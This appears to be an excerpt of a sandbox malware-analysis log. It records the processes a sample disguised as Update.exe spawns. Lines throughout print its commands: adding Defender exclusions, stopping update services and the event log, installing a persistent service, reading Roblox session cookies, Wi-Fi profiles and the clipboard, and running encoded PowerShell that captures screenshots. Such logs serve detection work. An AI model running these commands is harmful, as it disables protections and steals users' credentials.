                    Source: C:\Users\user\AppData\Local\Temp\Build.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                    Source: C:\Users\user\AppData\Local\Temp\Build.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                    Source: C:\Users\user\AppData\Local\Temp\Build.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
                    Source: C:\Users\user\AppData\Local\Temp\Build.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
                    Source: C:\Users\user\AppData\Local\Temp\Build.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                    Source: C:\Users\user\AppData\Local\Temp\Build.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
                    Source: C:\Users\user\AppData\Local\Temp\Build.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
                    Source: C:\Users\user\AppData\Local\Temp\Build.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "JLDYOGXF"
                    Source: C:\Users\user\AppData\Local\Temp\Build.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "JLDYOGXF" binpath= "C:\ProgramData\bmqxekewprir\nfblozsybbjy.exe" start= "auto"
                    Source: C:\Users\user\AppData\Local\Temp\Build.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
                    Source: C:\Users\user\AppData\Local\Temp\Build.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "JLDYOGXF"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yidhhzbx\yidhhzbx.cmdline"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8576.tmp" "c:\Users\user\AppData\Local\Temp\yidhhzbx\CSCA27ED749AA364CCD94BFD566BA81531.TMP"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                    Source: C:\ProgramData\bmqxekewprir\nfblozsybbjy.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                    Source: C:\ProgramData\bmqxekewprir\nfblozsybbjy.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                    Source: C:\ProgramData\bmqxekewprir\nfblozsybbjy.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
                    Source: C:\ProgramData\bmqxekewprir\nfblozsybbjy.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
                    Source: C:\ProgramData\bmqxekewprir\nfblozsybbjy.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
                    Source: C:\ProgramData\bmqxekewprir\nfblozsybbjy.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
                    Source: C:\ProgramData\bmqxekewprir\nfblozsybbjy.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
                    Source: C:\ProgramData\bmqxekewprir\nfblozsybbjy.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe
                    Source: C:\ProgramData\bmqxekewprir\nfblozsybbjy.exeProcess created: C:\Windows\explorer.exe explorer.exe
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
                    Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                    Source: C:\Users\user\Desktop\Update.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeSection loaded: vcruntime140.dllJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeSection loaded: python3.dllJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeSection loaded: libffi-7.dllJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeSection loaded: sqlite3.dllJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeSection loaded: libcrypto-1_1.dllJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeSection loaded: libssl-1_1.dllJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                    Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: propsys.dll
                    Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: edputil.dll
                    Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: urlmon.dll
                    Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: iertutil.dll
                    Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: srvcli.dll
                    Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: netutils.dll
                    Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: windows.staterepositoryps.dll
                    Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: appresolver.dll
                    Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: bcp47langs.dll
                    Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: slc.dll
                    Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: sppc.dll
                    Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: onecorecommonproxystub.dll
                    Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
